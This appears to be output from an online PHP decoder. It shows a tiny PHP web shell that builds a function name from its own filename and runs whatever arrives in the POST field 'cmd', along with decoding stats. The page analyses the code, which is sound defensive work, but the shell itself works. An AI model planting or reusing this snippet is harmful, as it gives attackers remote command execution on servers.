Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ${"function"}=substr(__FILE__,-10,-4);; ${"command"}=$_POST[cmd]; $function($comm..

Decoded Output download

<?php 
${"function"}=substr(__FILE__,-10,-4);; 
${"command"}=$_POST[cmd]; 
$function($command); ?>

Did this file decode correctly?

Original Code

<?php
${"function"}=substr(__FILE__,-10,-4);;
${"command"}=$_POST[cmd];
$function($command);

Function Calls

substr 1

Variables

function index

Stats

MD5 1f64de2760feb864fcca58c49e2cddf3
Eval Count 0
Decode Time 107 ms